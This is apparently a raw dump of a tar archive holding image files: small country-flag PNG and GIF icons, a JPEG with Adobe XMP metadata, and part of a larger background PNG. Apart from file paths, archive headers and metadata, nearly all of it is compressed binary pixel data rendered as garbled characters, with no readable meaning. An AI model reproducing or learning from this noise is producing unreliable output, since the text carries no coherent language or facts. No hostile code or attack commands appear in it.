IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b,�z���������ߟ?�?�022*������'���b���������¦$��A�@�? �������~����mE@�40�g���߿ _�~�@6�x�=|Ϟ�����"@K�89�0K����t�&�8�@��[z��M"-����b봗�b���P�߿@��*)�q�m@�@�����/��A0�0���q�;���^7��Lh�3�����
|�Tt��@�P�?zD�����_���6ˏ_@������A]T
a�U��V�����j�=�I,�$��߿���@�|z��?.Nf ��&H�@���%��1��d@�|���m��?~}���ˏ_Ҝ�@������Ǐz���A��{f�uDIEND�B`�images/flags/kw.png000060400000000746152434416630010247 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<xIDATx�bd�N�`�����`���1��B�^F��䀡�j��E�� rb�c?��Ŋ��W�40|��d�ӿ�
������7HP)����׿_@�,�,�	���������7,?�O����?�U�����AD�Y��2����_�����c"d"%)�`dd4�1 ��?�v�j����?n���� ���6�,�t�|��?ȉ�h��_��m:z�Ѕ`�ɿ_�|��ϗ���?,�+����6�P'��
$��e�����/��ʇ�J���HJ�����_�?`E@���F���� F���b��_"���he)���;IEND�B`�images/flags/bd.png000060400000000770152434416630010210 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bdpf@�����/�����D1��XúL�V�wO²\9f����gY�dR'p5!t�@,`��?y��/H�_�'�����ߏ�����Y�ׯ��~��-+,T
@,@gM�l��wڥ�L�~�����o�/�
_����{����V�j &�s������o�'@���$����/�{�~����/������_ �Ͽ?��@UIC�9H��?��F5� /����6�7���B����j@�4Y@!�����������À��$���A60t���h�V��?5�_�%�
����9ʿWȀ������@, ����
�����6(@��D��Q���bd�D�H� ���_��ak9IEND�B`�images/flags/ug.png000060400000001023152434416630010226 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b` #wt�������������������?0֟V���U��?������A���0���fd�}�i;@���c`�J���1�����X�_ ƿ_�3��f;�@,L��e�����o ����|�;Q���1��2������߿��d ��??��
t���@�25�{�VQQQwg��߿���B��S�@,�@���ϟ_�=���o�c�bbb�V�<p�P�ϟ@�_�~I�߿_30�����Y?��ο����
"�����_���?�\J�� Ɵ?�����ǀ&0� #��۷��;S����@c��ez��oF�G��"@�AR���[�@�_�~@B�\4) 0F���%IEND�B`�images/flags/eh.png000060400000000774152434416630010223 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b` ld`  U__$������?~��b�����Z��ݸ �X�:�?}�(�~���$��߯_s�}�����@,���J���U��������@,"R"ܬ��`��̙�'O����y9P�CKKٟ?� b` ��f�+W�Ϛ�����@�j��@��P)@1�셫-��II�׮����������/�����BB��9��?�N�) �A�߿�u,��aTRzs�@�(7(���x�70�������
"����M�ϖ����x�b�II�����џ@$0������oЌ�;��@���~������j9v^f0� O
�:�uIEND�B`�images/flags/az.png000060400000001115152434416630010227 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�x�������ÿ?@�?@l������	 �X���vU)�D����T�߿? �? ��_ �������4�@�0pq10�<�
g�����߿@����3������_@
��r�1���aFF�I�~�x���_��@������������$$͜	@,LL �M�����?��EE�JI��U^����߮^������߿��	���ğ���aWTfUP|���ed�.�����,$��00P#$~�a����k?�ޗLK{�f폻w��8��#P�'H0����@�����gsf������?�^y"���?_�ŵ�!�����*����_�B�����2�?����� �X>1���G�M�_pЀ����l� ����ߟ�1#C)P(j��$����a0��e#�WIEND�B`�images/flags/bg.gif000060400000000106152434416630010165 0ustar00GIF89a�����&�3!�,�������ڋ��6���H��);images/flags/hn.png000060400000001031152434416630010217 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�_����������������ݯ�.[ ��?�����T������"��П���W�. �_�~�����ϿA�a���/��?��'+��� �X�'x:J|���������A��@��V�������@1<���������W����ϟ�~����Ǐ��7_������/_���Ǐķ�����!�Y�X��Ū�/��/	N6F���?��>(���_��}d9�����6<���/L��y�I/g����\�(P���P%����X�'� F�޴z�{O���
����������� PL��9����,�2�����8�Aa�lPt@�ІjXD��ƀ�:��0ٽt�~�IEND�B`�images/flags/fr.gif000060400000000122152434416630010202 0ustar00GIF89a��$���&�!�,#���}�RsOD9A�7�z��`���F�S��+�kS;images/flags/kp.png000060400000001061152434416630010227 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b4��������� ���ï?@��� bc ƃ7������������(�������?v�@1~d`d����_��,L��|���? ��~����IJ����b|�����9(�Q^����_�W�ٽ���o�߿@��oF��f����� �����/����[��?��k�栠�ll�~���?��B���@����/������U�������0����
�t��N ��ϟ?�r.Э/^�޼�% ���߿�{���ϟ E?BU�m* ��v-Y–��_R�EM�gm�7o�f���x& b` �-�xx�=z�P��򕁋�?+�?�:p(c��?AA`�˩�ߵ�Y@�

sH���,��c�q�5@12�����x����@6@�
�X�g "�IEND�B`�images/flags/ro.gif000060400000000122152434416630010213 0ustar00GIF89a�+�&��!�,#�/��}�RsD9C�7�z	��`���F�S��+�kS;images/flags/el.gif000060400000000103152434416630010172 0ustar00GIF89a�����!�,L`��x���Y����u���J;images/Add_Ons.jpg000060400000003405152434416630010030 0ustar00���ExifII*��DuckyP��zhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:3458fb4e-3646-7f49-9914-a42eb2b6a487" xmpMM:DocumentID="xmp.did:3F2589802BA511E5923FF1152FA4417F" xmpMM:InstanceID="xmp.iid:3F25897F2BA511E5923FF1152FA4417F" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:69daf066-4f0d-8c42-8594-f17b53aac4ef" stRef:documentID="xmp.did:3458fb4e-3646-7f49-9914-a42eb2b6a487"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��Adobed����		

				
	
����y	
!1Q"2B$�As��W	81!A��?v�����g��V��o�H���'39��Pv���n�%+�(�J\�0��F!�!���	�MM��K�ҟ'��'L��57�	/�J|�7(�1��umx�=6_*��ݡk�n��Bl��Jq1#e�l�n"B����G�V���W)��t�Z��&��%�d�E%�I��
g�������!}hm��m�WwO�vT�"E6���jT[C�T� &@PS8b�
��Z�1�m���5�~7*O+����lƛpT�!,Eb�DH"�T�bu�(p�L@�&ƭ�HpM�TկΡ~�lW�E�:?�[Q�
)��J�Zp�,�IeQ-nAQr1�.S!b&*gQ@R@
�vE_[�[Y��*�����dT���.kgH�'�Ö �j�8j+*ʫ�UTƩ��+�j9��+,!�h��v��(@`b�X�����ѥ�Ai�k˔i<ͽ$B�����9!���2y�e�J���K���s��1�b!v}���}'�,��\#�g��������Ap'��˸��=)���)���W�G�/ߦPr0D��images/04/02/bg.png000060400000072171152434416630007567 0ustar00�PNG


IHDR09��w�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:8EE0DB5A52B711E38D7F8F2BFCA540A4" xmpMM:DocumentID="xmp.did:8EE0DB5B52B711E38D7F8F2BFCA540A4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8EE0DB5852B711E38D7F8F2BFCA540A4" stRef:documentID="xmp.did:8EE0DB5952B711E38D7F8F2BFCA540A4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�6*p�IDATxڄ�̮�U��{�n���93�g<_�b��IA�6�A(��&�j���M�$U���*E�4��H%m�84z�
*	����������9s9�����~�z�~�ߴ�X�s�����k=�Y��ι��?�������G~�����1ȷʢtan�:wr|�ʲt]�;�����,�r�pG����v�n���9?Z�_?����0��uU���c�K��E�n��H�o|Q���n�C��E�ҟb臲n�1}�O��J��ҵ��,���!\��
���Ç����/���݋�����g?�߻����]_�U�g�{n��3���,�����嗯�C{��~�~���?�cl���~�}�#���{��?j�����C�7|�?Zm��i��qz&}��1����pޯ��.�c}*�q�.V�����B�0��+��>�PUE�H�V����n������M��~t���w�W���=�{����V�Q�N��������G�O~��O�_?y��?��~��g�l��?�w�J��������7?��֠}���o����{l������*�O��<L�W���߻�gL�bWVU����b����r�ܧ���ж_�&��0�Mk�$���LUU}���v�c���,]�?����E�f��Z)��e��:
uYv릾i�
kg\/M�^]]]�ɧg��c�~8J">vz���c?�i�ӯ��i�����3���"=��ps}��S��K����r�����2\^^Ͻ���?���w�����l��lꪮ�m�j�\�c�߼���u��f�|���������>O�m�o���f�hn��i�����0��_��=w��m�]6�M����=�:/�O�\���>D瀞��(�1�U�^^��/���q8M���i}����|!��Gi���7��j�x)=����_�u��^L��B����1��'iGW�O��G7�m�����?��㿴��̀����^��d�e��r����t�Pz�㺮la(�C��n=MA��k�A*���w�g��㽶�K���ꢼI�ⳣ�,��y���.�ݧ��%�!�w�)]>�q��+��u6iDC7�o���Λ��4�W˺y1m�"x����
i��
���8Z.����I+vӏ!]��^|�����˟����6b���?7����=�9Mi����O���|糟�����/{��O>���6'�o�Uuv���nߌ��M�Dc#�4��}z�ֻx�M�&�qb����d�cz�6}w���:-�����Si#����?��?���]p�d����C����N�q穧���z�|�k��?�⃇�?C���%���
ܲ��fӥ{Ĵ��r�t�m��c1<G�u�i�(�b�,����X��?��ٷ�����ͮ����yU7E�2���W������Uڀ�>z�ڃ&�S��MW>��o�e}��`��V�{����擟�vX�X=���[���^������vw�
GWL�� <Z����A�1m��n���W�]�wX�U�j����V�^^�o��~�~:���p����Nㅟ5���˭Ӂ��BO��ºN{
;�L?O�2ME�[��^�]LÒ>�V)ƶ)k��4߮�+�֟�8��f��Iz���]鋐�k_�Kk�d��R� ���`��n-���4�w.nv�_|�Lf�5i~_wv:6�Ok.l�����I�|z�t
��-ϞL�8�JϽ������t��*\��nL/���gK�28�@Y�2��4+����5��i�$%���ޭ�`����a��������=,�=��0�!��ݴɋ�W�G�7i\}w������4e��i�_L�ʷ~�W�d�h,���s�0��K�G���o������v�t2�d��4/á��4�E��>}6l��a���A����V^0=)P����0:ɱ���^l�C�%댅�I>^-�g_��K'�'��٧�4n��7������ɶmMU�wO��WJ��&M��t��~���7O\�d�\�^y��qRB�;l�de�1��DЗNψŃ��FNkZ<ip��ݓ�mz��.�J׍ɂ�u�L_*����e��'�u���}��������bŸ�
:x��7<
L6�I�V�E�ڮ���<>7����6mw��O�rz��0�i�=H�NF�4g��sq��m\o+|w�\�E�{ac��O��e�������}1��|�3�Mڀ}�c�]\T8��,jܫ������eV�`b�;^��-���=;?����}����"��蓱��(�o:Xds`L�A~f�ǔ{��F{^{���b�ӻ��bD`p��1���I[�Z���ϼn���.��Y.oڴ���xݨة�Zġ=�}q\�yhilyn���U���Ԝ�n��Û`0/xn\�E�'֚�Z�}�x�բ�u�g�b�!���.�:={���a8��b�Ԡ���Y�k:1��$"��u���̕k��WØ�`u��i�`�9$do$�v�q�����`M��a?���m6k�}��p�b����W?=�_�����?��|�Ws�i�~�~6���߶|���_��Ë�����}x�|ܼ�tr��U�w<Yؐ8�֥K�@F��H�/K+"}�_�QU�~����2�8!dS�s��ɇ�
���dqֲ`�� ���۴`�O��d�;N�ŋfT�o�&}��	��-'h�^H�\/�}F}/l*3�,�A�ϖB_��m��>]����n0�����
��6r��s��	c�y&x��R���N�\7��w+�.J
�KYXXT�O|W==��==����Lx�ذ��0��w�I����#�Y�z&cŨc�%�=�[`��p�C���I�	���>�_1XG�xO<�޹�\���ɸa��w1�b\��]����0沾��(F>��"s�^�;YW�c����p�k�ax��w��+�g9t�s���e=�y���Aǚ��{��^��C��:��|FC��w��3���|=�����!$��9��2º������^�u�\gy�(�/�w�a��;ɐ�7���U]��w��ـaT�/}��77ۿ��/���v�Z�崅�I��,R���bFu��H�l�Z&~�Z��u5b:^X���
�W
�D�+/.|�&/r�J��@��T�
�|��F�]�`�೸�`��깸�ԍ���uʦ��}���i�ea�!{u��+��}�"�2,�q�{�<��iqIXS��ü�6#2h����d��d��˂���������~�;}^޿K��o]��#
�x\x�a�w�M7q�M�qB�AwC�݌� s��5-Z������B�4��1�"y�>/��wGِf���lۊI�F��	k��壴�jw~v���B�9B<��'Q�W�?<�c�O����ȞH�!��k޹|��0�+~��+�q���ޱ�븮�p��inԫƁ�k������}>|͸�~�s��)@���w�k(�|M;lZ��i-�\D\��c�()�G���>������?����}��48�]�O�ُ=�eo����‹���0Vrr��l�tS��£�{*�Ψ��:}6��0P���T�!OH^`<
�%�텇��ɂ�..�S2Pv���a����m�K���!�'���������BoR
�B�M�M�,���'�-|}75��m�c�t�Q\u�����A�FN���h�p��[���F�)m!���f�!�Ӟ��<����A�wՃ���aW�Z1��	y�|�
�KC�tS�B�����ɼɺ�~�����+ƂC�x�CB��!5��<��u��~�Ao�dܮ����n����5�9?�[z����,#a�s\�Yu<�c��U�֗F�����ap������!+����L��ȃ��l$��ʽ����s)��y��K�
CI���=Y̌�E!fd��d�y}|P��s�߻7<v��#O�{�W��m���������n��ƒ���\-���醿�w��p����f���\�G	
��%�zlf�t(=�}t��X�d���P��*�#�*i<�t�HFT6IU�ɰ	��8�����d��䦚�r��b�1��ղ�����!�l0����]�RAS٠N]��r冲��b�H�0��d,�^���������t9�K�'�P�66\{�#��4��~��+�p�OfF����L���u�ߪ���=^s���q]�ӓCI<w
�H϶�"�)O3E/��t����w�u���"N��/|��86��� lf�X�p������	����p���f-��ޓ�Q3���=x�;Ź�Q+��_ہ�HF�3GϜ^5pZ	'�0}?�U�L�>���l���J۟<�4*���y��(P�Zy��c�}_�y��<��5�~x���䙖�u�{���2Dr�e���`=�nv��f�~M�����§>�ǟ|�κn�
v�c�������CNU.��KFn� �`!CMYd�N��f{�\2��z�p���0k����D,�e�H]c"q���P�#�4�{)x*/�|��t��E�l�)�B����C��N%�0��Ƒ@-�s�=7�>M.n�6%�?j,u���b���L:���Z1j6f�����`X���\�a�,x�C�g��d��#a7>/�T��i�L��A�ΞQ<���H����)<lx����pۈs��i�Xp�g�V�9�7�N����슕�ݻ����1��Ђ�g⻄
Fz����p�BqQx���XFY�򬞇2=A�G�E��*���y����m�p=��<Cgņ+�-�aVfl�����g*��J#������~ƴµr����s��-N@��Q�
0����ü��5U��c@P�e��3���^�����/�'�-�����d|�뾾B�N%&��mV+1.]��$�*��49� �p�,YXc�4���b17S�؝;��`�
A-�Fغ:>�M숓i*�g,A�Z�U�C��{qY�UM�5���gh~�I�鞧�&��J����C@bBbDp�ˆ����kw�\�GG�i�mA��[L1{����Z�l
�>�}����2��q�	�]�ӬY����#i�_r��uh�B>!�P�P-v�	T�ⅆQ���A�P#g��C�2�eCt�KCK����K>3�?��F$�Lnv�G���S(�s�qdV4�N�5�n��7����4��
��3��B�}�R�w�B�)|L��
��e"+�p��ր`BL2ɚ"9�'�xU�
�'!I��)8/�<fBKFH��
~�}�p����1�lg��*�l�(&1��g#��A5�uYR�M8�غ��@#����ɢ{v�C�c�e_N�7_.ބ`KG�������P�2�����!�(-~XP�P�߀�1���Z�&���=B�{
��.����m�S<yv �� F;�C�)ي�g���"=>u���{�\���y97K�G@,$�Ӽ�@,�6�%ķ�D�����J#J��%�h�.1�ԸM\A�c��B85�xFlny�rZ,��^OY�ո�T�F�bCa~:����l���;�@P6ӽ���3�O=)RC
��7\��N�f�+5�T��Y��sN�*A�HpAz"1K��yu�Y٣��`������("#�(5��]���2�i�d�-Y���f���.�K�9��0>��UJ����I;fJ�%'d�� yH�miS�z�3�Āہ.�DNn�t	�#Kl�w�e<G�V��8�����c"5����R!ƽ�2�<�1-�l~6b��c�������W_~yHfD���ߋ�.F���/l���/-xXU�8+l��t�e�����UW�&	�[�u����^�A�)Z��d�J���#��bB�C3�N3� �CJ��){f��A3�^EZ�a\���`�O#�{~F�^V���O�+�:�x>w�>�l\�:��n��?&�U�H
7qa��HND�e��,ܨ��4�t��!V�E��=x���Ie,��+g%=�W�2�gC���1Xv�B!�p����&��"�-��s�1�b���";Ta�,��F�fؠ%r���	u��_el*'(B�\?1�+{�,�TL�`i��n�Y��e���پ^�
�h����9���0���$�0�E����=)���pc��	�3�>c ���[�eT-Qd�U�"��*g�����a]}���|(�\�c�uv�p�~o�l�"|4,������0���aO��K���d5���bxfh�A&�,����^��N5�℀���p��$�t'��4��_
ת:��9K覓�����z8c'��P���<���F����_�遄��6V3��v��B�`A�|]��0��۷m&k����J&l��{��2����SK
��D�<:1昛��v��9��P���w6��\��b��l2�o�^<�e�@i�y�P#HܑU@Z�%
�xk�t=��(�]�oF=��b!󽃛p$�@�Jyw\W�gz��Y�'x֣�I��Ncޗ'g1rF�_ �2z��3^Z{�A���3�CIB3���!� �$Z�X�/�b���g#|0?��ą��	ˢ���xN甄�z7(O-���H��[2���e^ÄA��� }�pF������O��E��၈�x�����i�����_��t��ɛ*�AI/
��M}Z*%�k�T��~g��D�%ˈx*N\�|b�|�xap7�d�LKUf@b�B_t���„g��0'�8�b%�k���$"�q+�u�y
‰jޗ�߶�-=\�H#Z����MՒ�@�=|����@�g��b;JM��!ȏs����x%��EZ�x?��r�����U�"JmAϽ@�4�iY�u2���_�+oԂH��6+���An�B���ł�n��SG%�O.6��?6.0������_�ӓh��1{���]��ٸ�UhB��9�z-�(;���M�_�����V��:�9�g�X�^R�V������4�`^�q�̘�^��0+��}���!"�T���
E�+����q�|�w�nm?��l��x��j!,���i�>j5���s�u�ۏn�^рI�a������_�S�����nM9�݄�ɔƩj��Ž���̼K���$C<�2c
X�ؠ���I@�h��e��l��C�dc3�`Lnd1Řq��8�2��"Ȁ��Z10B��G�/��)x�g$5������B��c>e�r:�*3���:��'6�q|���k
3#0<D,f!��ȄE�si,1&�7G���{��An��:�Zj2f����b�2s�F�(���"�$
F�wr���Ğ{���X&[��(���>�����J󜱆,��q���f�;IN��\!�&�[3�aA��3��zC�g�g|�L&�<�����ta�3�����)Τޑ���	��	��PFz��e���y)ef.�d	��)nx+6�r�+�3��s�>��Y��f��	� ��4��>�͒��s�4ԁx��%K�ax��	0�ON�\~�S�0v��:����(�8(�L
���b\h�K��	5�@�}�v0Xz8���0h�!e�iX׍�+,d7��jp�}P�32vr_��R����g�z׎lPYK������l{�Љ1��N���3��뱠��,����0��3��2Sn^2�D]#	�n���(�h��uN*T��eO��	�,�0�tvOн�w�݌�D��w�<K�H��[/���9k�@wy�>����.0)bI�b��/���I����BNzљbÐ�NyObdǤ�U>Xm�1��{��z���M�H�G�T��1����ay��wh�2�
+��vF8�ϻ���t�,xxt]?����X����φJ��H��5�t�D,�
Q�
1
9�d�2N�BO�
���w�n����IH�=;��P#FK�خD&����*��x���F�1O�~�LTI����>�O���Ҕ]Ā5U�ۛe=\�� ����X0�[�sP�Fa.sTҢp{ҋb� L[�WZ�H � ����е��G��۬v�t�EU�g��!����eXÄcĠj���g�<:O��$���1�-�3ߩb1�\�,�iTe*Fr˝�EE˜�A7L"��Z��Ð��x��Mj|7�Jk�rDn�0�լ�M6�Tz����jTk֢�1m�z��Xvd����Y��m���.�|j2��H��rc��$g�^�����+gu��ᩛd��"��ٱ��E�Y��<s[{(nv��dS�ȀC!����y,�Wf�V�hxdY���y�I(�Ӝ҃$��e����>�-I���NԠ�"c�%�.Hb���>6b�l|�B$�Q�Mn,І���!�>���v�{߰j��~��^�x�鉑	H�N�U�<�*�����}�f[�J�_m����aI�,@��X���-
Ow��x�F� �K�h�V�+P<d������AXg�����@����O2uP�Y�)v1+PV� =�ё�yp��f|�����<���-E]�̏j�: Kfw��=ic�U1�tQ3�3wd���hT��d/+���;��Z�2^a$A����L��'�z�!+M8z�YNԳ�A\{P�+��x�J)�B�T����W�D�5�I0�~�c@�ż_�n�$�N'�Q
a
_"�/�R4$ד_k���ܤZ	0汚gŻ
�D�%��*aR)��B3���5�+R/)u��ޏ�S���9{(e�3�%=���ٛ'ma������ʘaZÚ�Ji?�59�����D�����x9����z�Yr�Lp94wF3���Ң(Q�r,-qè��Vu,�"�9>z�-ŗ?�������~���%��Y���d��]NG`m������`���g`!�e*���c�l�\,L�~�VM5}Ѹ_%����B�F��Z_�a���,H�4�����KGr�A�1�Hȯ�?tY��I8eR/��?�}�f\�#H��E���NFF�}���l�`����s�
�&��|�T�c���03��1�ϒa���r�1��Ytd�O��"l&c�C��%�[�s=I����J���~�v;g�S�x� eUe�W����fS��̘�Â��(�ӱL�ve5#c�����!��͊�릸��8r�c�K��/;+����x"W,t�Cup���DQ�8�8�{�eM�ϡW�um���QTY�^�!�,<<FG���e�ϸc&�cԗ@�X"	�C�z1��K���@�7�7�7�`� �tn�������o��?�<t��z��ʪ,(��<	s�ōe5EݢH�c�uӐ�މ׀�C���u�0�=�D�fa,l���K]��*��J��θ,4mU�ϋ~ڳ{ZK�H裥W���*	�4��.���H CVV35��� ��sA#�*�;Jf�T��6���̀���zl2�Y��2E��s�K�F�kbNŏ,k��*3�Mj�2ud”���:�)L�����H"�[UN؍s��hX�D�?*J�T�f����B�\�?���r0�B�Ԛ��
�3��U���U5�L= �}f�[i�zVo\���'����U3��y��B�>��G,8�Z��`�7��܂�2'Dr�6�]=�jTdȇ�t��|�6�3r���Oߙ��Owr9>2���Y`����P�ʆew�R�>����={��{��L�BX���'~�_}����'�tk�ۭ�BN��0�S(e��6M���i�"E4N�8��Gf�쁅lj�$��]@N˺f-�0�pL�~C/Kdt�1�Ҧѥ<�zb����{ųB.�9���	VGC�(vU���{�3����������H@5˳�F�
a�-�Vo|��ظ�
׻�<�1
���2C�^��}nH
�b�%�g���9c�	3k-��s���P�}e�`Y�\nC��3C�u��+�;�g��:���0d�
lI˻ɵ�,W�J ��0�i9峚e�2��HR�͑A'#�&�����dѲ�3y!��--rF>�z�0U8XHf���>�@lY3�.S,&�Zq�fԼT;��L���"	�y��͑�S9�@F����Vh&�D���N���H03�{]�Q_�0ڵ���w�������x`���i�O��~�ᰗm)l�	G`�b�Jn-�J0����s�֮$wJ�ߔ�r�f�$�>S+�X�(
���z�QW).fQU"��!��.��а����;���!�*G�M�G2|U3��ADI�(u@=F�p� �r��@'(fv����h]t��Hؐ�)^�xS�[�!�y�-ʬ=e�t-���/1���{54�QT�HB>�^�8�Q9d��*�<C�1�������q��	Vrv|��s��I�>�V��|��
WA�<���$Ļ,L�r��Ux��Qœ� %CTŰLj���/h��L��2���ɍ�%�"F]�q��V�6SIN�������Qe�Z��=�f����t�4Ĥ��02N�E��3�Y�8�@[�k^}`���R��*!\���*ǃE�*O�<��L���-�����G>�`�C�}��^��5�y�⥋˯5��QE� �ĩF�G���P����(����L�Wr�Y	���Ж��P�=��
����L<,BLSPWm)�(-:�!���}�0Y�b'Đk[���<$�E����	�cd��o0��zx.�.����`�v|v׶�!�"��W5��|Z��0�g��<���m'�6�H��Hc/F��UЌ���䔒��&3ް�t0�^T�ޒ
	�a)	5����Y38�%�ȴn�QY�$�
��IjY@���Ր�;�L�.Y���
d7
g�Z7�g⩰�� Z?J�(�N	6��"ӭJ�jX*���s��O1�}�Yي�#��je[��t�d�<3�%r٤����!���#��^ՙ��^[E�:ҋN�ʜ
��ag�"�0@�kck��
č+ͭl��\���*��&���sO���f処"l�Ϧ;׊S���� �>9l�7x,�B����U�\o�|��T�	�V�@����fB�MeW6a��V+��e��Z-ac�0"�EP�zJUc#���X#%����{�8bI]o1��N�����p#8N:
W�ע���3�s�O�t|N3�
K�<KlafK�4��jQ��a��*Va�.�L�B3�����ph�#4�sP�{��8ga�˟�|��TS�B��Yu�l�Pk�r��i��rG�*G(�'�	�Wr��(T��\�<-'��8Mu�]A�В�x���[,�,U�1��z`����1顸�j
z��s2l��㔭3�$Ɍ���#%bJoap���r�II2�P�y!�Z��ɟ�-g�ʒ7}ǦU��4�����v
�4�\�cFk�]7�j/���gQ�U?�X�b�l{���Б1���Y�\�ap�ac}�9n���zT��Ij���6��Z$}gDѷ@G�;^7��k�}�:�	����mst|/�{����l$N^d�~�n�<Ӄ#E.�ا���b�T��>&M�Mƭ���ȅ�v+��3�I)�.UL�^+=9�Ԝ1��5��Y2S*�0h�/Q�5��[3�]�
����+O��.iU�nn&�XdAƴXX�q`mbͬM�XgU��� �N)���llʔ��%6��0 "������Z�k��̍��KIR����^de�\q \<��(��~�S�{��bF��$�G��&���>�B0
�L���_�lB���_�~�]�\v	�隢�7@�d_b�U�֣�*E�\vS1�pLt��P
����>5e�D"�P���䱍F�a�X�=kb]�����1K)nV�"aj+ѲkU�C��ea��i��VdC2�U��0��P|�
F4�Uc�UU�>#�w0c
����8���f؝�_	�XHk{�k�͸~u��v_a,��̸%�zT����c��3v
����s~w�h8B&��{����&�g,�\�+�T0\��W�ޝ���f�^]�u:�a�T2'fΉHN�O�^	�R��s�\?7PB�$m��n6�Oˉ���Z�qH��̟��q39J� kYz>A�fk�!Āᑴ>w�N�r����ӱ�8��@�V
B�ό!B����Y@S��2�{f����R$�rR:��R��ab��A66"Nz\����&)���'˿,�<>�+=ɹ�v�!�0S�5�n�O�/k&��.�Y�a o����2Vu��<a���tC�I�1��]�m�L�\.�<e�$����|ݬP}N���y��%^��80j�F�[m�c 3��I S\i�Ļ�wc�
���Vܯ$r͠�r/���'ףe@�i�`X�@����W*"�2��b�4�,+9���D{�v`����V�j
��>m!��}o��^�y�ZOb薰0ʄ�e�ӶKΔ����.Du�7�NF�;���|���_���XX�}�D�7r$��md,M׹�./s	�*a�Q+|2�����Q�E� �"�Ȥ�f
Ag��'Z%P��E
ѱ�Є$y�\q��K�Z�zV�K‰���(�b��{̬�A`�i����J�g[x���&�~�0,jH����RM��{&sX_i��R���%��H傺��?qy�<G��T�gE���,cE)oY̌�T���.DS��y"w-�b*�7SP�|
�'u�)�	�#��s��jYN�-p���y!~��
��U��2Ԭ�jZfV�F��Ӗ��z�O��#��q
��r-��%����ɑ���R�,i��q�0>)naF���SoH�Xޠ�Bp1e|(��gE��z �YfA}��ItR�:D�US��h�
����6�xK.j�:����:�E���[Dj�
����8���e�zM��3S@r$�SZu��?��~$�&�O���=�������[=x[�&)/�.���w,��.on�@��9�.�F�M
���E_R�Qj��A���)���a�q�D��D�H>5�8<�Y���E�1�n&��O.Tw��Pz�0�'�t�=���y)�<�T�b�[�����,27���L��ˋ�0�80&e2�;�wU=a$Q��ӓ�@�n�bF_�|�9m�R�n�C�^!&�,OcDb3:H8������*UC�8 5���c�:�\ͳV��snһ��oD�\s��?��X(G�H�r[���
W�ʩ�L���N����S���:��|��QQNz�0�
��
�PV}`�_a�ה@ROG�մF4��L���2��1��+��~V*T�8e+�s�Բ�!K�ϛ���ہ2�C���Ō��>SJGy��!�$�mmU�a�GoD!p���D/�ȯ��>�6�IM�JL�^����W�鉻{vG,
:M��R���ط{9�+ɜh�p�R@5t̞D�d�#AnXi�O��Iz8���+k��S��mؼ��T���a7t�2(OBľW��n2e@u��fJ�.�[#;;��)�eBh�r&[���Y(�*/.A K��U`|�r�^j3G��k6ΰ2.�x�cr�,2�E��eu�LF1�nQfR���$R6��scn�yj�;,B�r@���J�f�T��b<
̥����45�>��KV�mg;�#�\J.U`��r�>�l���P}^4���fԤl��r+^�)@Y-s�)7���T,{3-Ĺ�fUx�jN��_�Ǭ)g����I�P��ZVY0��*}�rVnF�w��Z�H���
���@�$^�s�R��QR�÷m�Hy,�Fr4�f�䀋S%c��c/�jFU	�v
��Ġˁ��~��:ԛ�u��
��'��A�z��
;�M���c�	v[��LmL��޸�J�RS����:��Z\�s���&�($W�Z�%Š��fV��5�ԍ>�E+%�u��Z�=Jg줤@"jA��/*�M�V�@^>?v�daཪgN�y���G�e2�LO�tJ?�?�N�0j21��Ȏ�F����#�@C��Vam�pcR���	^.�X�f��n���:?!X���c�?1N��La�å��8��:��MB�P#kt��l=���jw�\�jP*vZ2e��1kř瀂d�8y�\gj�۶
~@����USH�>��j�uf�@�-M���Y�a��2f�D�q�s���ဖd1��֬q��p4���!Ce!��wj�7��}�LAVj����<c��ً�A��+��@��")�< ,t�_tR|��!��T����pttT�
Xdx��҃��Z�΄$g���hg�Ѵ�J5N�z��#=�$���M��bh�"��Y�Զm�e%z�1|B�@*J��7)D�IJ��EF�F8P�i��30��"��Rֺ@�L2h���0���4xp������
